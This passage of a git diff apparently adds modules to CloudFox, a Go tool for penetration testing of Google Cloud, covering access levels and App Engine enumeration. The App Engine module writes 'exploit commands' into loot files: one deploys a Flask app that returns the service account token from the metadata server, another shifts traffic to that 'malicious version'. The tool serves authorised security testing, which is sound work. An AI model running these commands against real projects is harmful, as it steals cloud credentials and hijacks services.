time.Duration) string { + if d < time.Minute { + return fmt.Sprintf("%.1f seconds", d.Seconds()) + } else if d < time.Hour { + minutes := int(d.Minutes()) + seconds := int(d.Seconds()) % 60 + return fmt.Sprintf("%dm %ds", minutes, seconds) + } + hours := int(d.Hours()) + minutes := int(d.Minutes()) % 60 + return fmt.Sprintf("%dh %dm", hours, minutes) +} + func init() { // Globals flags for the GCP commands @@ -86,7 +494,7 @@ func init() { // GCPCommands.PersistentFlags().StringVarP(&GCPOrganization, "organization", "o", "", "Organization name or number, repetable") GCPCommands.PersistentFlags().StringVarP(&GCPProjectID, "project", "p", "", "GCP project ID") GCPCommands.PersistentFlags().StringVarP(&GCPProjectIDsFilePath, "project-list", "l", "", "Path to a file containing a list of project IDs separated by newlines") - // GCPCommands.PersistentFlags().BoolVarP(&GCPAllProjects, "all-projects", "a", false, "Use all project IDs available to activated gloud account or given gcloud account") + GCPCommands.PersistentFlags().BoolVarP(&GCPAllProjects, "all-projects", "A", false, "Automatically discover and target all accessible projects") // GCPCommands.PersistentFlags().BoolVarP(&GCPConfirm, "yes", "y", false, "Non-interactive mode (like apt/yum)") // GCPCommands.PersistentFlags().StringVarP(&GCPOutputFormat, "output", "", "brief", "[\"brief\" | \"wide\" ]") GCPCommands.PersistentFlags().IntVarP(&Verbosity, "verbosity", "v", 2, "1 = Print control messages only\n2 = Print control messages, module output\n3 = Print control messages, module output, and loot file output\n") @@ -94,16 +502,102 @@ func init() { GCPCommands.PersistentFlags().StringVar(&GCPOutputDirectory, "outdir", defaultOutputDir, "Output Directory ") // GCPCommands.PersistentFlags().IntVarP(&Goroutines, "max-goroutines", "g", 30, "Maximum number of concurrent goroutines") GCPCommands.PersistentFlags().BoolVarP(&GCPWrapTable, "wrap", "w", false, "Wrap table to fit in terminal (complicates grepping)") + GCPCommands.PersistentFlags().BoolVar(&GCPFlatOutput, "flat-output", false, "Use legacy flat output structure instead of hierarchical per-project directories") + GCPCommands.PersistentFlags().BoolVar(&GCPRefreshCache, "refresh-cache", false, "Force re-enumeration of cached data (cache auto-expires after 24 hours)") // Available commands GCPCommands.AddCommand( - commands.GCPBucketsCommand, + // Core/existing commands + commands.GCPStorageCommand, commands.GCPArtifactRegistryCommand, commands.GCPBigQueryCommand, commands.GCPSecretsCommand, commands.GCPIAMCommand, + commands.GCPPermissionsCommand, + commands.GCPResourceIAMCommand, commands.GCPInstancesCommand, commands.GCPWhoAmICommand, + + // Compute/serverless commands + commands.GCPFunctionsCommand, + commands.GCPCloudRunCommand, + commands.GCPAppEngineCommand, + commands.GCPGKECommand, + commands.GCPCloudSQLCommand, + + // New infrastructure commands + commands.GCPPubSubCommand, + commands.GCPKMSCommand, + commands.GCPLoggingCommand, + commands.GCPSchedulerCommand, + commands.GCPDNSCommand, + commands.GCPFirewallCommand, + commands.GCPServiceAccountsCommand, + commands.GCPKeysCommand, + commands.GCPEndpointsCommand, + commands.GCPWorkloadIdentityCommand, + commands.GCPIdentityFederationCommand, + commands.GCPOrganizationsCommand, + commands.GCPCloudBuildCommand, + commands.GCPMemorystoreCommand, + commands.GCPFilestoreCommand, + commands.GCPSpannerCommand, + commands.GCPBigtableCommand, + + // Data processing commands + commands.GCPDataflowCommand, + commands.GCPComposerCommand, + + // Security/Compliance commands + commands.GCPVPCSCCommand, + commands.GCPAssetInventoryCommand, + commands.GCPSecurityCenterCommand, + commands.GCPComplianceDashboardCommand, + commands.GCPBackupInventoryCommand, + commands.GCPCostSecurityCommand, + commands.GCPMonitoringAlertsCommand, + + // Network/Infrastructure commands + commands.GCPLoadBalancersCommand, + commands.GCPVPCNetworksCommand, + commands.GCPNetworkTopologyCommand, + + // ML/Data Science commands + commands.GCPNotebooksCommand, + commands.GCPDataprocCommand, + + // Zero Trust/Access commands + commands.GCPIAPCommand, + commands.GCPBeyondCorpCommand, + commands.GCPAccessLevelsCommand, + + // Pentest/Exploitation commands + commands.GCPPrivescCommand, + commands.GCPOrgPoliciesCommand, + commands.GCPStorageEnumCommand, + commands.GCPLoggingEnumCommand, + commands.GCPBigQueryEnumCommand, + commands.GCPBigtableEnumCommand, + commands.GCPSpannerEnumCommand, + commands.GCPCrossProjectCommand, + commands.GCPSourceReposCommand, + commands.GCPServiceAgentsCommand, + commands.GCPDomainWideDelegationCommand, + commands.GCPPrivateServiceConnectCommand, + commands.GCPCloudArmorCommand, + commands.GCPCertManagerCommand, + commands.GCPLateralMovementCommand, + commands.GCPDataExfiltrationCommand, + commands.GCPPublicAccessCommand, + commands.GCPFoxMapperCommand, + + // Inventory command + commands.GCPInventoryCommand, + + // Hidden admin commands + commands.GCPHiddenAdminsCommand, + + // All checks (last) GCPAllChecksCommand, ) } diff --git a/gcp/commands/accesslevels.go b/gcp/commands/accesslevels.go new file mode 100644 index 00000000..ecc90b01 --- /dev/null +++ b/gcp/commands/accesslevels.go @@ -0,0 +1,453 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + accesspolicyservice "github.com/BishopFox/cloudfox/gcp/services/accessPolicyService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" +) + +var accessLevelOrgID string + +var GCPAccessLevelsCommand = &cobra.Command{ + Use: globals.GCP_ACCESSLEVELS_MODULE_NAME, + Aliases: []string{"access-levels", "conditional-access", "ca"}, + Short: "Enumerate Access Context Manager access levels", + Long: `Enumerate Access Context Manager access levels (conditional access policies). + +Features: +- Lists all access levels in the organization +- Shows IP-based, device-based, and identity conditions +- Identifies overly permissive access levels +- Analyzes device policy requirements + +Organization Discovery: +- Automatically discovers organization from project ancestry if --org not specified +- Use --org to explicitly specify an organization ID`, + Run: runGCPAccessLevelsCommand, +} + +func init() { + GCPAccessLevelsCommand.Flags().StringVar(&accessLevelOrgID, "org", "", "Organization ID (required)") +} + +type AccessLevelsModule struct { + gcpinternal.BaseGCPModule + OrgID string + OrgAccessLevels map[string][]accesspolicyservice.AccessLevelInfo // orgID -> access levels + LootMap map[string]map[string]*internal.LootFile // orgID -> loot files + mu sync.Mutex +} + +type AccessLevelsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o AccessLevelsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o AccessLevelsOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPAccessLevelsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ACCESSLEVELS_MODULE_NAME) + if err != nil { + return + } + + // Discover organizations if not specified + orgIDs := []string{} + if accessLevelOrgID != "" { + orgIDs = append(orgIDs, accessLevelOrgID) + } else { + // Auto-discover organizations from project ancestry + discoveredOrgs := discoverOrganizations(cmdCtx.Ctx, cmdCtx.ProjectIDs, cmdCtx.Logger) + if len(discoveredOrgs) == 0 { + cmdCtx.Logger.ErrorM("Could not discover any organizations. Use --org flag to specify one.", globals.GCP_ACCESSLEVELS_MODULE_NAME) + return + } + orgIDs = discoveredOrgs + cmdCtx.Logger.InfoM(fmt.Sprintf("Discovered %d organization(s) from project ancestry", len(orgIDs)), globals.GCP_ACCESSLEVELS_MODULE_NAME) + } + + module := &AccessLevelsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + OrgAccessLevels: make(map[string][]accesspolicyservice.AccessLevelInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + // Process each organization + for _, orgID := range orgIDs { + module.processOrg(cmdCtx.Ctx, orgID, cmdCtx.Logger) + } + + // Write combined output + allLevels := module.getAllAccessLevels() + if len(allLevels) == 0 { + cmdCtx.Logger.InfoM("No access levels found", globals.GCP_ACCESSLEVELS_MODULE_NAME) + return + } + + cmdCtx.Logger.SuccessM(fmt.Sprintf("Found %d access level(s)", len(allLevels)), globals.GCP_ACCESSLEVELS_MODULE_NAME) + module.writeOutput(cmdCtx.Ctx, cmdCtx.Logger) +} + +// discoverOrganizations finds organization IDs from project ancestry +func discoverOrganizations(ctx context.Context, projectIDs []string, logger internal.Logger) []string { + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + return nil + } + + orgMap := make(map[string]bool) + for _, projectID := range projectIDs { + resp, err := crmService.Projects.GetAncestry(projectID, &cloudresourcemanager.GetAncestryRequest{}).Do() + if err != nil { + continue + } + + for _, ancestor := range resp.Ancestor { + if ancestor.ResourceId.Type == "organization" { + orgMap[ancestor.ResourceId.Id] = true + } + } + } + + var orgs []string + for orgID := range orgMap { + orgs = append(orgs, orgID) + } + return orgs +} + +func (m *AccessLevelsModule) getAllAccessLevels() []accesspolicyservice.AccessLevelInfo { + var all []accesspolicyservice.AccessLevelInfo + for _, levels := range m.OrgAccessLevels { + all = append(all, levels...) + } + return all +} + +func (m *AccessLevelsModule) processOrg(ctx context.Context, orgID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating access levels for organization: %s", orgID), globals.GCP_ACCESSLEVELS_MODULE_NAME) + } + + m.mu.Lock() + // Initialize loot for this org + if m.LootMap[orgID] == nil { + m.LootMap[orgID] = make(map[string]*internal.LootFile) + m.LootMap[orgID]["access-levels-details"] = &internal.LootFile{ + Name: "access-levels-details", + Contents: "# Access Levels (Conditional Access Policies)\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap[orgID]["access-levels-allowed-ips"] = &internal.LootFile{ + Name: "access-levels-allowed-ips", + Contents: "", + } + } + m.mu.Unlock() + + svc := accesspolicyservice.New() + + levels, err := svc.ListAccessLevels(orgID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_ACCESSLEVELS_MODULE_NAME, + fmt.Sprintf("Could not list access levels for org %s", orgID)) + return + } + + m.mu.Lock() + m.OrgAccessLevels[orgID] = levels + for _, level := range levels { + m.addToLoot(orgID, level) + } + m.mu.Unlock() +} + +func (m *AccessLevelsModule) addToLoot(orgID string, level accesspolicyservice.AccessLevelInfo) { + if lootFile := m.LootMap[orgID]["access-levels-details"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# ACCESS LEVEL: %s\n"+ + "# =============================================================================\n"+ + "# Title: %s\n"+ + "# Policy: %s\n"+ + "# Combining Function: %s\n"+ + "# Conditions: %d\n", + level.Name, level.Title, level.PolicyName, level.CombiningFunction, len(level.Conditions)) + + // Condition details + for i, condition := range level.Conditions { + lootFile.Contents += fmt.Sprintf("# --- Condition %d ---\n", i+1) + if len(condition.IPSubnetworks) > 0 { + lootFile.Contents += fmt.Sprintf("# IP Subnets: %s\n", strings.Join(condition.IPSubnetworks, ", ")) + } + if len(condition.Members) > 0 { + lootFile.Contents += fmt.Sprintf("# Members: %s\n", strings.Join(condition.Members, ", ")) + } + if len(condition.Regions) > 0 { + lootFile.Contents += fmt.Sprintf("# Regions: %s\n", strings.Join(condition.Regions, ", ")) + } + if condition.DevicePolicy != nil { + lootFile.Contents += "# Device Policy: configured\n" + } + } + + // Extract short level name for gcloud commands + levelName := level.Name + policyName := level.PolicyName + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe this access level: +gcloud access-context-manager levels describe %s --policy=%s + +# List all conditions for this access level: +gcloud access-context-manager levels describe %s --policy=%s --format=json | jq '.basic.conditions' + +# List all access levels in this policy: +gcloud access-context-manager levels list --policy=%s + +# === EXPLOIT COMMANDS === + +# Check if your current IP is allowed by this access level: +curl -s ifconfig.me && echo " <- Check if this IP is in the allowed subnets above" + +`, levelName, policyName, + levelName, policyName, + policyName) + + // Add IP-specific bypass checks + if len(level.Conditions) > 0 { + for _, condition := range level.Conditions { + if len(condition.IPSubnetworks) > 0 { + lootFile.Contents += "# Test connectivity from allowed IP ranges (use with VPN/proxy):\n" + for _, ip := range condition.IPSubnetworks { + lootFile.Contents += fmt.Sprintf("# Allowed subnet: %s\n", ip) + } + lootFile.Contents += "\n" + } + if len(condition.Members) > 0 { + lootFile.Contents += "# Members that can bypass this access level:\n" + for _, member := range condition.Members { + lootFile.Contents += fmt.Sprintf("# %s\n", member) + } + lootFile.Contents += "\n" + } + } + } + } + + for _, condition := range level.Conditions { + for _, ip := range condition.IPSubnetworks { + if lootFile := m.LootMap[orgID]["access-levels-allowed-ips"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf("%s # %s\n", ip, level.Name) + } + } + } +} + +func (m *AccessLevelsModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *AccessLevelsModule) getLevelsHeader() []string { + return []string{"Org ID", "Name", "Title", "Policy", "Combining", "Conditions", "Device Policy"} +} + +func (m *AccessLevelsModule) getConditionsHeader() []string { + return []string{"Org ID", "Level", "Condition", "IP Ranges", "Members", "Regions", "Device Requirements"} +} + +func (m *AccessLevelsModule) levelsToTableBody(levels []accesspolicyservice.AccessLevelInfo, orgID string) [][]string { + var body [][]string + for _, level := range levels { + hasDevicePolicy := "No" + for _, cond := range level.Conditions { + if cond.DevicePolicy != nil { + hasDevicePolicy = "Yes" + break + } + } + + combiningFunc := level.CombiningFunction + if combiningFunc == "" { + combiningFunc = "AND" + } + + body = append(body, []string{ + orgID, + level.Name, + level.Title, + level.PolicyName, + combiningFunc, + fmt.Sprintf("%d", len(level.Conditions)), + hasDevicePolicy, + }) + } + return body +} + +func (m *AccessLevelsModule) conditionsToTableBody(levels []accesspolicyservice.AccessLevelInfo, orgID string) [][]string { + var body [][]string + for _, level := range levels { + for i, cond := range level.Conditions { + ipRanges := strings.Join(cond.IPSubnetworks, ", ") + if ipRanges == "" { + ipRanges = "(any)" + } + + members := strings.Join(cond.Members, ", ") + if members == "" { + members = "(any)" + } + + regions := strings.Join(cond.Regions, ", ") + if regions == "" { + regions = "(any)" + } + + deviceReqs := "(none)" + if cond.DevicePolicy != nil { + var reqs []string + if cond.DevicePolicy.RequireScreenLock { + reqs = append(reqs, "screen-lock") + } + if cond.DevicePolicy.RequireCorpOwned { + reqs = append(reqs, "corp-owned") + } + if cond.DevicePolicy.RequireAdminApproval { + reqs = append(reqs, "admin-approval") + } + if len(reqs) > 0 { + deviceReqs = strings.Join(reqs, ", ") + } + } + + body = append(body, []string{ + orgID, + level.Name, + fmt.Sprintf("%d", i+1), + ipRanges, + members, + regions, + deviceReqs, + }) + } + } + return body +} + +func (m *AccessLevelsModule) buildTablesForOrg(orgID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if levels, ok := m.OrgAccessLevels[orgID]; ok && len(levels) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "access-levels", + Header: m.getLevelsHeader(), + Body: m.levelsToTableBody(levels, orgID), + }) + + condBody := m.conditionsToTableBody(levels, orgID) + if len(condBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "access-level-conditions", + Header: m.getConditionsHeader(), + Body: condBody, + }) + } + } + + return tableFiles +} + +func (m *AccessLevelsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for orgID := range m.OrgAccessLevels { + tableFiles := m.buildTablesForOrg(orgID) + + var lootFiles []internal.LootFile + if orgLoot, ok := m.LootMap[orgID]; ok { + for _, loot := range orgLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.OrgLevelData[orgID] = AccessLevelsOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_ACCESSLEVELS_MODULE_NAME) + } +} + +func (m *AccessLevelsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Collect all org IDs + var orgIDs []string + for orgID := range m.OrgAccessLevels { + orgIDs = append(orgIDs, orgID) + } + + // Build combined tables with org ID in each row + var allLevelRows [][]string + var allCondRows [][]string + for orgID, levels := range m.OrgAccessLevels { + allLevelRows = append(allLevelRows, m.levelsToTableBody(levels, orgID)...) + allCondRows = append(allCondRows, m.conditionsToTableBody(levels, orgID)...) + } + + if len(allLevelRows) > 0 { + tables = append(tables, internal.TableFile{ + Name: "access-levels", + Header: m.getLevelsHeader(), + Body: allLevelRows, + }) + } + + if len(allCondRows) > 0 { + tables = append(tables, internal.TableFile{ + Name: "access-level-conditions", + Header: m.getConditionsHeader(), + Body: allCondRows, + }) + } + + var lootFiles []internal.LootFile + for _, orgLoot := range m.LootMap { + for _, loot := range orgLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := AccessLevelsOutput{Table: tables, Loot: lootFiles} + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "org", orgIDs, orgIDs, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ACCESSLEVELS_MODULE_NAME) + } +} diff --git a/gcp/commands/appengine.go b/gcp/commands/appengine.go new file mode 100644 index 00000000..47d88a3a --- /dev/null +++ b/gcp/commands/appengine.go @@ -0,0 +1,828 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + "google.golang.org/api/appengine/v1" +) + +// Module name constant +const GCP_APPENGINE_MODULE_NAME string = "app-engine" + +var GCPAppEngineCommand = &cobra.Command{ + Use: GCP_APPENGINE_MODULE_NAME, + Aliases: []string{"appengine", "gae"}, + Short: "Enumerate App Engine applications and security configurations", + Long: `Analyze App Engine applications for security configurations and potential issues. + +Features: +- Lists all App Engine services and versions +- Identifies public services without authentication +- Analyzes ingress settings and firewall rules +- Detects environment variable secrets +- Reviews service account configurations +- Identifies deprecated runtimes +- Analyzes traffic splitting configurations`, + Run: runGCPAppEngineCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type AppEngineApp struct { + ProjectID string + ID string + LocationID string + AuthDomain string + DefaultHostname string + ServingStatus string + DefaultBucket string + ServiceAccount string + DispatchRules int + FirewallRules int +} + +type AppEngineService struct { + ProjectID string + ID string + AppID string + Split map[string]float64 + DefaultURL string + VersionCount int + LatestVersion string +} + +type AppEngineVersion struct { + ProjectID string + ServiceID string + ID string + AppID string + Runtime string + Environment string + ServingStatus string + CreateTime string + InstanceClass string + Scaling string + Network string + VPCConnector string + IngressSettings string + EnvVarCount int + SecretEnvVars int + ServiceAccount string + URL string + DeprecatedRuntime bool + DefaultSA bool + Public bool +} + +type AppEngineFirewallRule struct { + ProjectID string + Priority int64 + Action string + SourceRange string + Description string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type AppEngineModule struct { + gcpinternal.BaseGCPModule + + // Per-project data for hierarchical output + ProjectApps map[string][]AppEngineApp + ProjectServices map[string][]AppEngineService + ProjectVersions map[string][]AppEngineVersion + ProjectFirewallRules map[string][]AppEngineFirewallRule + LootMap map[string]map[string]*internal.LootFile + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper cache for attack path analysis + mu sync.Mutex + + totalApps int + totalServices int + publicCount int + secretsFound int +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type AppEngineOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o AppEngineOutput) TableFiles() []internal.TableFile { return o.Table } +func (o AppEngineOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPAppEngineCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_APPENGINE_MODULE_NAME) + if err != nil { + return + } + + module := &AppEngineModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectApps: make(map[string][]AppEngineApp), + ProjectServices: make(map[string][]AppEngineService), + ProjectVersions: make(map[string][]AppEngineVersion), + ProjectFirewallRules: make(map[string][]AppEngineFirewallRule), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *AppEngineModule) Execute(ctx context.Context, logger internal.Logger) { + // Get FoxMapper cache from context + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + + logger.InfoM("Enumerating App Engine applications...", GCP_APPENGINE_MODULE_NAME) + + aeService, err := appengine.NewService(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create App Engine service: %v", err), GCP_APPENGINE_MODULE_NAME) + return + } + + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProject(ctx, project, aeService, logger) + }(projectID) + } + wg.Wait() + + if m.totalApps == 0 { + logger.InfoM("No App Engine applications found", GCP_APPENGINE_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d App Engine app(s) with %d service(s) and %d version(s)", + m.totalApps, m.totalServices, len(m.getAllVersions())), GCP_APPENGINE_MODULE_NAME) + + if m.publicCount > 0 { + logger.InfoM(fmt.Sprintf("Found %d public service(s) without authentication", m.publicCount), GCP_APPENGINE_MODULE_NAME) + } + + if m.secretsFound > 0 { + logger.InfoM(fmt.Sprintf("Found %d potential secret(s) in environment variables", m.secretsFound), GCP_APPENGINE_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *AppEngineModule) processProject(ctx context.Context, projectID string, aeService *appengine.APIService, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating App Engine for project: %s", projectID), GCP_APPENGINE_MODULE_NAME) + } + + app, err := aeService.Apps.Get(projectID).Do() + if err != nil { + if !strings.Contains(err.Error(), "404") { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_APPENGINE_MODULE_NAME, + fmt.Sprintf("Could not get App Engine app in project %s", projectID)) + } + return + } + + m.mu.Lock() + m.totalApps++ + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["appengine-commands"] = &internal.LootFile{ + Name: "appengine-commands", + Contents: "# App Engine Commands\n" + + "# Generated by CloudFox\n" + + "# WARNING: Only use with proper authorization\n\n", + } + } + + // Add app-level enumeration and exploit commands to loot + m.addAppToLoot(projectID, app.Id, app.DefaultHostname, app.LocationId, app.ServiceAccount) + m.mu.Unlock() + + appRecord := AppEngineApp{ + ProjectID: projectID, + ID: app.Id, + LocationID: app.LocationId, + AuthDomain: app.AuthDomain, + DefaultHostname: app.DefaultHostname, + ServingStatus: app.ServingStatus, + DefaultBucket: app.DefaultBucket, + ServiceAccount: app.ServiceAccount, + } + + if app.DispatchRules != nil { + appRecord.DispatchRules = len(app.DispatchRules) + } + + m.mu.Lock() + m.ProjectApps[projectID] = append(m.ProjectApps[projectID], appRecord) + m.mu.Unlock() + + m.enumerateServices(ctx, projectID, aeService, logger) + m.enumerateFirewallRules(ctx, projectID, aeService, logger) +} + +func (m *AppEngineModule) enumerateServices(ctx context.Context, projectID string, aeService *appengine.APIService, logger internal.Logger) { + services, err := aeService.Apps.Services.List(projectID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_APPENGINE_MODULE_NAME, + fmt.Sprintf("Could not enumerate App Engine services in project %s", projectID)) + return + } + + for _, svc := range services.Services { + m.mu.Lock() + m.totalServices++ + m.mu.Unlock() + + serviceRecord := AppEngineService{ + ProjectID: projectID, + ID: svc.Id, + AppID: projectID, + } + + if svc.Split != nil { + serviceRecord.Split = svc.Split.Allocations + } + + m.mu.Lock() + m.ProjectServices[projectID] = append(m.ProjectServices[projectID], serviceRecord) + m.mu.Unlock() + + ingressSettings := "all" + if svc.NetworkSettings != nil && svc.NetworkSettings.IngressTrafficAllowed != "" { + ingressSettings = svc.NetworkSettings.IngressTrafficAllowed + } + + m.enumerateVersions(ctx, projectID, svc.Id, ingressSettings, aeService, logger) + } +} + +func (m *AppEngineModule) enumerateVersions(ctx context.Context, projectID, serviceID, ingressSettings string, aeService *appengine.APIService, logger internal.Logger) { + versions, err := aeService.Apps.Services.Versions.List(projectID, serviceID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_APPENGINE_MODULE_NAME, + fmt.Sprintf("Could not enumerate App Engine versions for service %s", serviceID)) + return + } + + for _, ver := range versions.Versions { + versionRecord := AppEngineVersion{ + ProjectID: projectID, + ServiceID: serviceID, + ID: ver.Id, + AppID: projectID, + Runtime: ver.Runtime, + Environment: ver.Env, + ServingStatus: ver.ServingStatus, + CreateTime: ver.CreateTime, + IngressSettings: ingressSettings, + ServiceAccount: ver.ServiceAccount, + URL: ver.VersionUrl, + } + + if ver.InstanceClass != "" { + versionRecord.InstanceClass = ver.InstanceClass + } + + if ver.Network != nil { + versionRecord.Network = ver.Network.Name + } + + if ver.VpcAccessConnector != nil { + versionRecord.VPCConnector = ver.VpcAccessConnector.Name + } + + // Scaling type + if ver.AutomaticScaling != nil { + versionRecord.Scaling = "automatic" + } else if ver.BasicScaling != nil { + versionRecord.Scaling = "basic" + } else if ver.ManualScaling != nil { + versionRecord.Scaling = "manual" + } + + // Check for deprecated runtime + versionRecord.DeprecatedRuntime = m.isDeprecatedRuntime(ver.Runtime) + + // Check environment variables for secrets + if ver.EnvVariables != nil { + versionRecord.EnvVarCount = len(ver.EnvVariables) + secretCount := m.analyzeEnvVars(ver.EnvVariables, serviceID, ver.Id, projectID) + versionRecord.SecretEnvVars = secretCount + } + + // Check ingress settings for public access + if versionRecord.IngressSettings == "all" || versionRecord.IngressSettings == "INGRESS_TRAFFIC_ALLOWED_ALL" { + versionRecord.Public = true + m.mu.Lock() + m.publicCount++ + m.mu.Unlock() + } + + // Check for default service account + if versionRecord.ServiceAccount == "" || strings.Contains(versionRecord.ServiceAccount, "@appspot.gserviceaccount.com") { + versionRecord.DefaultSA = true + } + + m.mu.Lock() + m.ProjectVersions[projectID] = append(m.ProjectVersions[projectID], versionRecord) + m.mu.Unlock() + } +} + +func (m *AppEngineModule) enumerateFirewallRules(ctx context.Context, projectID string, aeService *appengine.APIService, logger internal.Logger) { + rules, err := aeService.Apps.Firewall.IngressRules.List(projectID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_APPENGINE_MODULE_NAME, + fmt.Sprintf("Could not enumerate App Engine firewall rules in project %s", projectID)) + return + } + + for _, rule := range rules.IngressRules { + fwRule := AppEngineFirewallRule{ + ProjectID: projectID, + Priority: rule.Priority, + Action: rule.Action, + SourceRange: rule.SourceRange, + Description: rule.Description, + } + + m.mu.Lock() + m.ProjectFirewallRules[projectID] = append(m.ProjectFirewallRules[projectID], fwRule) + m.mu.Unlock() + } + + m.mu.Lock() + for i := range m.ProjectApps[projectID] { + if m.ProjectApps[projectID][i].ProjectID == projectID { + m.ProjectApps[projectID][i].FirewallRules = len(rules.IngressRules) + break + } + } + m.mu.Unlock() +} + +func (m *AppEngineModule) addAppToLoot(projectID, appID, defaultHostname, locationID, serviceAccount string) { + lootFile := m.LootMap[projectID]["appengine-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# APP ENGINE: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Location: %s\n"+ + "# Default Hostname: %s\n"+ + "# Service Account: %s\n", + appID, projectID, locationID, defaultHostname, serviceAccount, + ) + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe app: +gcloud app describe --project=%s + +# List services: +gcloud app services list --project=%s + +# List versions for all services: +gcloud app versions list --project=%s + +# List firewall rules: +gcloud app firewall-rules list --project=%s + +# Describe specific service: +gcloud app services describe default --project=%s + +# View application logs: +gcloud app logs read --project=%s --limit=50 + +# List dispatch rules: +gcloud app describe --project=%s --format=json | jq '.dispatchRules' + +# === EXPLOIT COMMANDS === + +# Deploy a new version (code execution as App Engine SA: %s): +# Create a minimal app.yaml: +cat > /tmp/app.yaml << 'APPEOF' +runtime: python39 +instance_class: F1 +handlers: +- url: /.* + script: auto +APPEOF +cat > /tmp/main.py << 'MAINEOF' +import requests, json +from flask import Flask +app = Flask(__name__) +@app.route('/') +def index(): + r = requests.get('http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token', headers={'Metadata-Flavor': 'Google'}) + return json.dumps(r.json()) +MAINEOF +gcloud app deploy /tmp/app.yaml --project=%s --quiet --no-promote + +# Deploy to a specific service: +gcloud app deploy /tmp/app.yaml --project=%s --service=cloudfox-test --quiet --no-promote + +# Set traffic to new malicious version: +gcloud app services set-traffic default --splits=VERSION_ID=1 --project=%s + +# SSH to App Engine Flex instance (only for flex environment): +gcloud app instances ssh INSTANCE_ID --service=SERVICE --version=VERSION --project=%s + +# Access default URL: +curl https://%s + +# Impersonate App Engine default 